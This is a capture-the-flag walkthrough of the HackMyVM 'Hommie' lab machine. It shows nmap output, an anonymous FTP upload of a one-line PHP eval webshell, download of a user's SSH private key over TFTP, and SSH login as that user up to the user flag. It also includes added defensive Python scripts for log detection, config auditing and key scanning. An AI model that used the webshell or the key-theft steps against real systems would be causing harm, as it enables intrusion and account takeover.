Hommie
Remarks
[Linux VM] [Tested on VirtualBox] created by || sml
⏲️ Release Date // 2020-09-30
✔️ MD5 // 5c6915e238e3e0647e1d508522907c74
☠ Root // 225
💀 User // 230
📝Notes // Enumeration is the KEY. Tested on VirtualBox.
Starting the target machine
Target IP:
192.168.56.105
Information gathering with nmap
Nmap scan report for 192.168.56.105
Host is up (0.00031s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.102
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c627ab53abb9c020373652a960d353fc (RSA)
| 256 483b281f9a23da71f6050ba5a6c8b7b0 (ECDSA)
|_ 256 b32e7cff622d53dd6397d44772c84e30 (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:B6:0D:21 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
We can see that the FTP service allows anonymous access. The instinctive assumption is that the FTP directory may be the web service's document root, in which case a webshell could be written there to gain a foothold.
Accessing the web service
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Hommie]
└──╼ $http get 192.168.56.105
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Fri, 22 Dec 2023 15:03:52 GMT
ETag: W/"5f749979-63"
Last-Modified: Wed, 30 Sep 2020 14:43:05 GMT
Server: nginx/1.14.2
Transfer-Encoding: chunked
alexia, Your id_rsa is exposed, please move it!!!!!
Im fighting regarding reverse shells!
-nobody
Two characters appear:
alexia
nobody
Anonymous login to the FTP service
The FTP service allows anonymous access
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Hommie]
└──╼ $ftp 192.168.56.105
Connected to 192.168.56.105.
220 (vsFTPd 3.0.3)
Name (192.168.56.105:randark): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
List all directories and files
ftp> ls -lah
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 0 113 4096 Sep 30 2020 .
drwxr-xr-x 3 0 113 4096 Sep 30 2020 ..
drwxrwxr-x 2 0 113 4096 Sep 30 2020 .web
-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html
226 Directory send OK.
Inspect the .web directory
ftp> cd .web
250 Directory successfully changed.
ftp> ls -lah
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x 2 0 113 4096 Sep 30 2020 .
drwxr-xr-x 3 0 113 4096 Sep 30 2020 ..
-rw-r--r-- 1 0 0 99 Sep 30 2020 index.html
226 Directory send OK.
And a webshell can be uploaded
ftp> put webshell.php
local: webshell.php remote: webshell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
32 bytes sent in 0.00 secs (459.5588 kB/s)
ftp> ls -lah
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x 2 0 113 4096 Dec 22 10:17 .
drwxr-xr-x 3 0 113 4096 Sep 30 2020 ..
-rw-r--r-- 1 0 0 99 Sep 30 2020 index.html
-rw-r--r-- 1 106 113 32 Dec 22 10:17 webshell.php
226 Directory send OK.
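The anonymous upload above is exactly the event a defender wants to catch: vsftpd records every transfer as an `OK UPLOAD` line, so a few lines of log parsing can flag script files written by the anonymous account. The following is an added example (it is not part of the original writeup, and the log lines are constructed to follow vsftpd's default `[pid N] [user] OK UPLOAD: Client "...", "path", N bytes` log style rather than copied from the box); the client address format mirrors the `::ffff:192.168.56.102` form shown in the `ftp-syst` output.

```python
"""Flag anonymous FTP uploads of server-side script files in a vsftpd log."""
import re
from pathlib import PurePosixPath

# Shape of vsftpd's own log lines (xferlog_std_format=NO); assumption for this example.
LOG_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ [\d:]+ \d{4}) \[pid \d+\] \[(?P<user>[^\]]*)\] '
    r'(?P<status>OK|FAIL) (?P<action>[A-Z ]+?): Client "(?P<client>[^"]+)"'
    r'(?:, "(?P<path>[^"]+)")?'
)

# vsftpd logs the anonymous session under ftp_username (default "ftp").
ANON_USERS = {"ftp", "anonymous"}
# Extensions a web server might hand to an interpreter if they land in the document root.
SCRIPT_EXT = {".php", ".phtml", ".phar", ".jsp", ".asp", ".aspx", ".cgi", ".pl", ".py", ".sh"}

# Constructed sample log, not captured from the target.
SAMPLE_LOG = """\
Fri Dec 22 10:15:02 2023 [pid 1187] [ftp] OK LOGIN: Client "::ffff:192.168.56.102", anon password "?"
Fri Dec 22 10:16:40 2023 [pid 1190] [alexia] OK UPLOAD: Client "::ffff:192.168.56.102", "/home/alexia/notes.txt", 120 bytes, 1.20Kbyte/sec
Fri Dec 22 10:17:21 2023 [pid 1190] [ftp] OK UPLOAD: Client "::ffff:192.168.56.102", "/.web/webshell.php", 32 bytes, 0.05Kbyte/sec
Fri Dec 22 10:17:30 2023 [pid 1190] [ftp] FAIL UPLOAD: Client "::ffff:192.168.56.102", "/.web/other.php", 0.00Kbyte/sec
Fri Dec 22 10:18:00 2023 [pid 1190] [ftp] OK UPLOAD: Client "::ffff:192.168.56.102", "/.web/logo.png", 4096 bytes, 40.00Kbyte/sec
"""


def parse_line(line):
    """Return the named fields of one vsftpd log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def detect_anon_script_uploads(lines):
    """Return one alert per successful anonymous upload whose extension is a script type."""
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if not ev or ev["status"] != "OK" or ev["action"] != "UPLOAD" or not ev["path"]:
            continue
        ext = PurePosixPath(ev["path"]).suffix.lower()
        if ev["user"] in ANON_USERS and ext in SCRIPT_EXT:
            alerts.append({"ts": ev["ts"], "client": ev["client"], "path": ev["path"]})
    return alerts


if __name__ == "__main__":
    for a in detect_anon_script_uploads(SAMPLE_LOG.splitlines()):
        print(f"ALERT {a['ts']}: anonymous upload of {a['path']} from {a['client']}")
```

Only the successful anonymous `.php` upload is reported; the local user's upload, the failed attempt and the image are ignored. Running this over `/var/log/vsftpd.log` (the default `vsftpd_log_file`) is the usual deployment.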
Try accessing the webshell
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Hommie]
└──╼ $http get 192.168.56.105/webshell.php
HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: keep-alive
Content-Length: 32
Content-Type: application/octet-stream
Date: Fri, 22 Dec 2023 15:18:06 GMT
ETag: "6585a881-20"
Last-Modified: Fri, 22 Dec 2023 15:17:21 GMT
Server: nginx/1.14.2
<?php @eval($_POST['shell']) ?>
The file is returned normally (the upload into .web is reachable at the site root, so .web is nginx's document root), but the server does not execute PHP: nginx has no PHP handler and serves the file verbatim as application/octet-stream, so the upload gives no code execution.
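What made the upload possible at all is a vsftpd configuration that lets anonymous clients write into a directory the web server also serves. The box's actual vsftpd.conf is not shown in the writeup, so the following added example (not the original author's code) audits two constructed configurations: one with the weak anonymous-upload settings and one hardened. The checked options and their compiled-in defaults come from vsftpd.conf(5); the web root path is a parameter you would set to whatever nginx's `root` directive points at.

```python
"""Audit a vsftpd.conf for the anonymous-upload-into-webroot combination."""
from pathlib import PurePosixPath

# Compiled-in vsftpd defaults for the options checked here (per vsftpd.conf(5)).
DEFAULTS = {
    "anonymous_enable": "YES",
    "write_enable": "NO",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
    "anon_root": "",   # empty: anonymous root is the ftp user's home directory
}

# Constructed configurations for the demo, not the target's real files.
WEAK_CONF = """\
listen=YES
anonymous_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
anon_root=/var/www/html
"""

HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_local_user=YES
"""


def parse_vsftpd_conf(text):
    """Return option -> value, starting from the compiled-in defaults."""
    conf = dict(DEFAULTS)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def _yes(value):
    return value.upper() == "YES"


def _overlaps(a, b):
    """True if one absolute path equals the other or lies underneath it."""
    pa, pb = PurePosixPath(a), PurePosixPath(b)
    return pa == pb or pb in pa.parents or pa in pb.parents


def audit_vsftpd(conf, web_root="/var/www/html"):
    """Return a list of findings; empty means none of the checked weaknesses apply."""
    findings = []
    anon = _yes(conf["anonymous_enable"])
    writable = _yes(conf["write_enable"])
    if anon and writable and _yes(conf["anon_upload_enable"]):
        findings.append("anonymous clients may upload files "
                        "(anonymous_enable, write_enable and anon_upload_enable are all YES)")
    if anon and writable and _yes(conf["anon_mkdir_write_enable"]):
        findings.append("anonymous clients may create directories (anon_mkdir_write_enable=YES)")
    if anon and conf["anon_root"] and _overlaps(conf["anon_root"], web_root):
        findings.append(f"anonymous FTP root {conf['anon_root']} overlaps the web root {web_root}")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{name}]")
        for finding in audit_vsftpd(parse_vsftpd_conf(text)) or ["no findings"]:
            print("  -", finding)
```

Pass the text of `/etc/vsftpd.conf` to `parse_vsftpd_conf` and the nginx `root` to `audit_vsftpd`. The audit treats an anonymous root that merely overlaps the web root as a finding even when uploads are off, because a read-only overlap still exposes whatever sits in the web tree, and it stays silent for a read-only anonymous share kept outside the web root.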
Download id_rsa via the TFTP service and use it
The nmap scan above covered TCP ports only; TFTP listens on UDP port 69 and therefore does not appear in it, but the note on the web page says alexia's id_rsa is exposed, and the host's TFTP service serves it without authentication.
Download the id_rsa file
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Hommie]
└──╼ $tftp 192.168.56.105
tftp> get id_rsa
Received 1850 bytes in 0.0 seconds
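The note from "nobody" described the problem precisely: a private key left in a directory that an unauthenticated service (here TFTP) hands out. The following added example (not from the original writeup) is the check a host owner would run against a TFTP or web root to find such files before anyone else does. It builds a constructed directory tree in a temp folder; the "keys" it contains are placeholder PEM blocks, not real key material, and the sample file names are assumptions.

```python
"""Find private keys lying in a directory tree that an unauthenticated service exposes."""
import os
import re
import stat
import tempfile
from pathlib import Path

# PEM-style headers used by OpenSSH, OpenSSL and PKCS#8 private keys.
PRIVATE_KEY_RE = re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----")
# Names that are conventionally private keys even when the content check misses.
KEY_NAME_RE = re.compile(r"^(id_(rsa|dsa|ecdsa|ed25519)|.+\.(pem|key|ppk))$")


def looks_like_private_key(data):
    """Content check: a PEM private-key header within the first few KiB."""
    return PRIVATE_KEY_RE.search(data[:4096]) is not None


def find_exposed_keys(root):
    """Walk `root` and report files that are (or are named like) private keys."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        try:
            with open(path, "rb") as fh:
                head = fh.read(4096)
        except OSError:
            continue
        by_content = looks_like_private_key(head)
        by_name = KEY_NAME_RE.match(path.name) is not None
        if not (by_content or by_name):
            continue
        mode = path.stat().st_mode
        findings.append({
            "path": path.relative_to(root).as_posix(),
            "by_content": by_content,
            "by_name": by_name,
            # A TFTP daemon normally runs as its own user, so "other" read bits matter.
            "world_readable": bool(mode & stat.S_IROTH),
        })
    return sorted(findings, key=lambda f: f["path"])


def build_demo_tree():
    """Constructed TFTP-root lookalike; the key bodies are placeholders, not real keys."""
    root = Path(tempfile.mkdtemp(prefix="tftproot-demo-"))
    (root / "id_rsa").write_bytes(
        b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
        b"CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-KEY\n"
        b"-----END OPENSSH PRIVATE KEY-----\n")
    os.chmod(root / "id_rsa", 0o644)   # world-readable, as a key left for tftpd to serve would be
    (root / "readme.txt").write_bytes(b"boot images only\n")
    (root / "backup").mkdir()
    (root / "backup" / "server.bak").write_bytes(
        b"-----BEGIN RSA PRIVATE KEY-----\nCONSTRUCTED-PLACEHOLDER\n-----END RSA PRIVATE KEY-----\n")
    os.chmod(root / "backup" / "server.bak", 0o600)   # found by content despite the bland name
    return root


if __name__ == "__main__":
    for f in find_exposed_keys(build_demo_tree()):
        access = "WORLD-READABLE" if f["world_readable"] else "owner-only"
        print(f"{f['path']}: private key ({access})")
```

Both files are reported: `id_rsa` by name and content, `backup/server.bak` by content alone, which is why the scan reads file headers rather than trusting names. Point `find_exposed_keys` at the TFTP root (`/srv/tftp` on Debian) and at the web document root; anything it returns should be moved out and the key rotated, since a copy may already have been fetched.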
Log in over SSH with the private key
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Hommie]
└──╼ $ssh alexia@192.168.56.105 -i id_rsa
Linux hommie 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Dec 22 10:59:52 2023 from 192.168.56.102
alexia@hommie:~$ whoami
alexia
user pwned
alexia@hommie:~$ cat user.txt
Imnotroot